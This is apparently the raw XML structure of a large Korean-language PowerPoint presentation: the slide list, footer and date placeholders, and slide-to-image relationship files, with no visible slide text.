
<file path=[Content_Types].xml><?xml version="1.0" encoding="utf-8"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="bmp" ContentType="image/bmp"/>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3" r:id="rId3"/>
    <p:sldId id="453" r:id="rId4"/>
    <p:sldId id="287" r:id="rId5"/>
    <p:sldId id="444" r:id="rId6"/>
    <p:sldId id="445" r:id="rId7"/>
    <p:sldId id="446" r:id="rId8"/>
    <p:sldId id="447" r:id="rId9"/>
    <p:sldId id="448" r:id="rId10"/>
    <p:sldId id="383" r:id="rId11"/>
    <p:sldId id="394" r:id="rId12"/>
    <p:sldId id="381" r:id="rId13"/>
    <p:sldId id="458" r:id="rId14"/>
    <p:sldId id="380" r:id="rId15"/>
    <p:sldId id="457" r:id="rId16"/>
    <p:sldId id="456" r:id="rId17"/>
    <p:sldId id="459" r:id="rId18"/>
    <p:sldId id="455" r:id="rId19"/>
    <p:sldId id="382" r:id="rId20"/>
    <p:sldId id="452" r:id="rId21"/>
    <p:sldId id="454" r:id="rId22"/>
    <p:sldId id="451" r:id="rId23"/>
    <p:sldId id="384" r:id="rId24"/>
    <p:sldId id="373" r:id="rId25"/>
    <p:sldId id="374" r:id="rId26"/>
    <p:sldId id="375" r:id="rId27"/>
    <p:sldId id="395" r:id="rId28"/>
    <p:sldId id="396" r:id="rId29"/>
    <p:sldId id="418" r:id="rId30"/>
    <p:sldId id="397" r:id="rId31"/>
    <p:sldId id="398" r:id="rId32"/>
    <p:sldId id="399" r:id="rId33"/>
    <p:sldId id="419" r:id="rId34"/>
    <p:sldId id="400" r:id="rId35"/>
    <p:sldId id="417" r:id="rId36"/>
    <p:sldId id="263" r:id="rId37"/>
    <p:sldId id="260" r:id="rId38"/>
    <p:sldId id="450" r:id="rId39"/>
    <p:sldId id="449" r:id="rId40"/>
    <p:sldId id="270" r:id="rId41"/>
    <p:sldId id="271" r:id="rId42"/>
    <p:sldId id="272" r:id="rId43"/>
    <p:sldId id="273" r:id="rId44"/>
    <p:sldId id="385" r:id="rId45"/>
    <p:sldId id="279" r:id="rId46"/>
    <p:sldId id="280" r:id="rId47"/>
    <p:sldId id="281" r:id="rId48"/>
    <p:sldId id="282" r:id="rId49"/>
    <p:sldId id="386" r:id="rId50"/>
    <p:sldId id="387" r:id="rId51"/>
    <p:sldId id="388" r:id="rId52"/>
    <p:sldId id="389" r:id="rId53"/>
    <p:sldId id="390" r:id="rId54"/>
    <p:sldId id="391" r:id="rId55"/>
    <p:sldId id="392" r:id="rId56"/>
    <p:sldId id="393" r:id="rId57"/>
    <p:sldId id="402" r:id="rId58"/>
    <p:sldId id="410" r:id="rId59"/>
    <p:sldId id="411" r:id="rId60"/>
    <p:sldId id="406" r:id="rId61"/>
    <p:sldId id="403" r:id="rId62"/>
    <p:sldId id="414" r:id="rId63"/>
    <p:sldId id="415" r:id="rId64"/>
    <p:sldId id="416" r:id="rId65"/>
    <p:sldId id="409" r:id="rId66"/>
    <p:sldId id="405" r:id="rId67"/>
    <p:sldId id="407" r:id="rId68"/>
    <p:sldId id="404" r:id="rId69"/>
    <p:sldId id="435" r:id="rId70"/>
    <p:sldId id="437" r:id="rId71"/>
    <p:sldId id="439" r:id="rId72"/>
    <p:sldId id="440" r:id="rId73"/>
    <p:sldId id="442" r:id="rId74"/>
    <p:sldId id="443" r:id="rId75"/>
    <p:sldId id="438" r:id="rId76"/>
    <p:sldId id="436" r:id="rId77"/>
    <p:sldId id="460" r:id="rId78"/>
    <p:sldId id="462" r:id="rId79"/>
    <p:sldId id="463" r:id="rId80"/>
    <p:sldId id="467" r:id="rId81"/>
    <p:sldId id="469" r:id="rId82"/>
    <p:sldId id="466" r:id="rId83"/>
    <p:sldId id="464" r:id="rId84"/>
    <p:sldId id="471" r:id="rId85"/>
    <p:sldId id="470" r:id="rId86"/>
    <p:sldId id="284" r:id="rId87"/>
    <p:sldId id="285" r:id="rId88"/>
    <p:sldId id="286" r:id="rId89"/>
    <p:sldId id="355" r:id="rId90"/>
    <p:sldId id="291" r:id="rId91"/>
    <p:sldId id="288" r:id="rId92"/>
    <p:sldId id="292" r:id="rId93"/>
    <p:sldId id="293" r:id="rId94"/>
    <p:sldId id="294" r:id="rId95"/>
    <p:sldId id="297" r:id="rId96"/>
    <p:sldId id="298" r:id="rId97"/>
    <p:sldId id="299" r:id="rId98"/>
    <p:sldId id="300" r:id="rId99"/>
    <p:sldId id="301" r:id="rId100"/>
    <p:sldId id="302" r:id="rId101"/>
    <p:sldId id="303" r:id="rId102"/>
    <p:sldId id="304" r:id="rId103"/>
    <p:sldId id="305" r:id="rId104"/>
    <p:sldId id="306" r:id="rId105"/>
    <p:sldId id="307" r:id="rId106"/>
    <p:sldId id="308" r:id="rId107"/>
    <p:sldId id="309" r:id="rId108"/>
    <p:sldId id="310" r:id="rId109"/>
    <p:sldId id="315" r:id="rId110"/>
    <p:sldId id="316" r:id="rId111"/>
    <p:sldId id="317" r:id="rId112"/>
    <p:sldId id="311" r:id="rId113"/>
    <p:sldId id="312" r:id="rId114"/>
    <p:sldId id="313" r:id="rId115"/>
    <p:sldId id="314" r:id="rId116"/>
    <p:sldId id="318" r:id="rId117"/>
    <p:sldId id="319" r:id="rId118"/>
    <p:sldId id="320" r:id="rId119"/>
    <p:sldId id="321" r:id="rId120"/>
    <p:sldId id="322" r:id="rId121"/>
    <p:sldId id="323" r:id="rId122"/>
    <p:sldId id="324" r:id="rId123"/>
    <p:sldId id="326" r:id="rId124"/>
    <p:sldId id="327" r:id="rId125"/>
    <p:sldId id="328" r:id="rId126"/>
    <p:sldId id="329" r:id="rId127"/>
    <p:sldId id="330" r:id="rId128"/>
    <p:sldId id="331" r:id="rId129"/>
    <p:sldId id="332" r:id="rId130"/>
    <p:sldId id="333" r:id="rId131"/>
    <p:sldId id="334" r:id="rId132"/>
    <p:sldId id="335" r:id="rId133"/>
    <p:sldId id="336" r:id="rId134"/>
    <p:sldId id="337" r:id="rId135"/>
    <p:sldId id="338" r:id="rId136"/>
    <p:sldId id="339" r:id="rId137"/>
    <p:sldId id="340" r:id="rId138"/>
    <p:sldId id="341" r:id="rId139"/>
    <p:sldId id="342" r:id="rId140"/>
    <p:sldId id="343" r:id="rId141"/>
    <p:sldId id="344" r:id="rId142"/>
    <p:sldId id="345" r:id="rId143"/>
    <p:sldId id="346" r:id="rId144"/>
    <p:sldId id="347" r:id="rId145"/>
    <p:sldId id="348" r:id="rId146"/>
    <p:sldId id="349" r:id="rId147"/>
    <p:sldId id="350" r:id="rId148"/>
    <p:sldId id="351" r:id="rId149"/>
    <p:sldId id="352" r:id="rId150"/>
    <p:sldId id="353" r:id="rId151"/>
    <p:sldId id="354" r:id="rId152"/>
    <p:sldId id="356" r:id="rId153"/>
    <p:sldId id="357" r:id="rId154"/>
    <p:sldId id="358" r:id="rId155"/>
    <p:sldId id="359" r:id="rId156"/>
    <p:sldId id="360" r:id="rId157"/>
    <p:sldId id="361" r:id="rId158"/>
    <p:sldId id="362" r:id="rId159"/>
    <p:sldId id="363" r:id="rId160"/>
    <p:sldId id="364" r:id="rId161"/>
    <p:sldId id="367" r:id="rId162"/>
    <p:sldId id="368" r:id="rId163"/>
    <p:sldId id="370" r:id="rId164"/>
    <p:sldId id="372" r:id="rId165"/>
    <p:sldId id="369" r:id="rId166"/>
    <p:sldId id="376" r:id="rId167"/>
    <p:sldId id="377" r:id="rId168"/>
    <p:sldId id="378" r:id="rId169"/>
    <p:sldId id="379" r:id="rId170"/>
    <p:sldId id="371" r:id="rId171"/>
    <p:sldId id="420" r:id="rId172"/>
    <p:sldId id="421" r:id="rId173"/>
    <p:sldId id="422" r:id="rId174"/>
    <p:sldId id="428" r:id="rId175"/>
    <p:sldId id="424" r:id="rId176"/>
    <p:sldId id="425" r:id="rId177"/>
    <p:sldId id="427" r:id="rId178"/>
    <p:sldId id="426" r:id="rId179"/>
    <p:sldId id="429" r:id="rId180"/>
    <p:sldId id="430" r:id="rId181"/>
    <p:sldId id="431" r:id="rId182"/>
    <p:sldId id="432" r:id="rId183"/>
    <p:sldId id="433" r:id="rId184"/>
    <p:sldId id="434" r:id="rId185"/>
    <p:sldId id="423" r:id="rId186"/>
    <p:sldId id="268" r:id="rId187"/>
    <p:sldId id="365" r:id="rId188"/>
    <p:sldId id="366" r:id="rId189"/>
    <p:sldId id="296" r:id="rId190"/>
    <p:sldId id="325" r:id="rId191"/>
    <p:sldId id="290" r:id="rId192"/>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izona95" initials="a" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="arizona95"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4CF95"/>
    <a:srgbClr val="D6DCE5"/>
    <a:srgbClr val="F743BB"/>
    <a:srgbClr val="FDDFC7"/>
    <a:srgbClr val="00682F"/>
    <a:srgbClr val="007A37"/>
    <a:srgbClr val="009644"/>
    <a:srgbClr val="00B050"/>
    <a:srgbClr val="00863D"/>
    <a:srgbClr val="0050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61" d="100"/>
          <a:sy n="161" d="100"/>
        </p:scale>
        <p:origin x="150" y="2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91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide190.xml"/><Relationship Id="rId196"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93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthor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viewProps" Target="viewProps.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0481F0-79A4-4005-98A0-E2D3EC31CA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026B3D3-DCCB-4A07-B0DD-5543B7034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D9AC3FD-A806-4EBD-B90B-3CD603C7F3EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAB802B-FA19-43A7-BCDF-A9F08327D3D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4CA637C-E9BE-4CC2-BC4D-84113B59005F}"/>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9304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3513E9-3B4F-40F7-9817-FA7FFFB527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1C20440-E792-4EAF-90D1-973CFC58F0F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947AC27-E2EE-453E-84B9-A3DB250B6179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87C64E3D-00A7-4F3D-9072-3E2181DE3A5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1F152D-39FB-401B-AE62-CAA8D30D8204}"/>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19339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CBEB766-9B37-4186-A52C-BEA602250B2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472C367-6AB0-45D0-A9BB-A54DDA36F9A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C76DEC4-3F14-4645-A85E-F57A22A2FEC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65278FE0-5E0A-4072-B202-B9D9624E237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F00AEC0-8237-46D8-A127-DD900DDB3908}"/>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2178328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80BD6B-E7FB-4331-875F-864D94F5833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4E93028-63D9-46D6-8B3A-40AB76FC0EA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FC29581-CF73-4701-803B-266B2624730F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F72EB11-9DDA-43AF-A854-377C80D0A04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008E4F2-697A-41EE-985D-36D0A79EA60C}"/>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42811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0D8CB1-852D-401E-B278-FBC5613F8D1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118E5B5A-E122-4CEF-A426-B2355574C2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F0ABCD7-C359-4AFA-8425-996C323D15C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3287B66A-CE4B-46BB-BB28-42A7D081E12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167310-4314-4BB7-AB49-79FE227EEA4B}"/>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40408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266D10-FE53-4436-B95E-E2E8F3898BA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72A40FE-884A-4E81-9192-3426D6E7A8B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A60227F-EB33-4B57-8F10-BCA3F2BC250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B944643-7641-42D1-B6D5-C9C7EAC11298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="바닥글 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42BD34A-7C75-41A8-850F-D9160B9B508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C51D1D3-1BD9-4100-8C71-110C352EEBE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3932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6A9931-2247-44C9-89DF-059E9713404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2D8C236-25CD-4439-B9ED-25D3898949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7B7C5AF-DDC3-48AF-B2D5-F4F947D1F95F}"/>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12C9BCF-920C-4DAB-878F-359E434B33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B7625E3-DE59-4610-A6BE-23205B2AFA7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B2A1A04B-45A7-40BE-91D8-38755C79EA77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="바닥글 개체 틀 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8CCD877-D8CF-4650-BE74-85374E948C5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3EB9669-0D1B-4B47-99C6-16323285D8D3}"/>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55785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543F9A-E385-42C7-8701-4D74B5B8CA5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78EB64F-8ED3-41B4-9700-3628CA44285F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="바닥글 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77927889-7E0F-400C-AAED-DF87414DB4A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5C34461-452C-4ED9-90D0-B4AA91A20F72}"/>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842567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0CB02B8-4E17-4DA0-A3EA-0676B7C1467D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="바닥글 개체 틀 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62AB1434-C511-48DD-88E3-012FF7B9FF2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99F2338-A1C3-4BEE-9E95-CA75D1B17E2A}"/>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7044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3C02C4-867C-42ED-93E1-803EC71FAF6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472612D-AC7A-4A81-9FE9-9D2CF84385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01AE26A-4CBD-446C-A829-C39559D9A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E8CB2B1-EBC3-466A-B38E-9AC64511DF39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="바닥글 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A933EDA-E4CA-4779-B5D1-986F4F492ED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B15E1F6-72DE-452F-8D71-E6DDE060AB5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36914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2966F9-6418-4A3B-98EC-67D6DA91330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D6428325-C368-44A4-B5A9-5734A2A741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E633756-F646-4E38-BB54-CD2404C80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2464646-9AA8-494A-9141-A0F72F9C0269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5961A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="바닥글 개체 틀 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6028736-F7B8-4EFD-B348-7A603061028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66A8044-83D1-4160-82A3-8E2C0A7DDA6E}"/>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278306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D17A306-05F3-40CE-AA98-32DCDEE87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74B5F2A-448A-47DA-A1B4-56AD66D74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68726F2-2EEC-4433-A65F-A673E510A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1A6F7-18CE-4D97-8B22-87968FF9FBF8}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:t>2021-03-08</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="바닥글 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB67D242-A733-4D47-BA32-E853E3ACC2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0BBF35AC-9656-4592-B2F5-ACEBCC3476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6171716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2.xml"/><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_rels/slide10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slide" Target="slide88.xml"/><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101.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88.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02.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8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88.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04.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8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88.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0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slide" Target="slide88.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10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slide" Target="slide88.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108.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132.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.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31.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image130.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide109.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><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jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide110.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38.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image136.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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slide" Target="slide8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88.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1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slide" Target="slide88.xml"/><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114.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><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bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11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slide" Target="slide88.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16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><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17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image156.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image155.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><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53.gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image152.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide118.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image157.gif"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8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88.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23.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide120.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slide" Target="slide88.xml"/><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121.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image163.bmp"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image166.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image165.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image164.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12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slide" Target="slide88.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image168.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide123.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
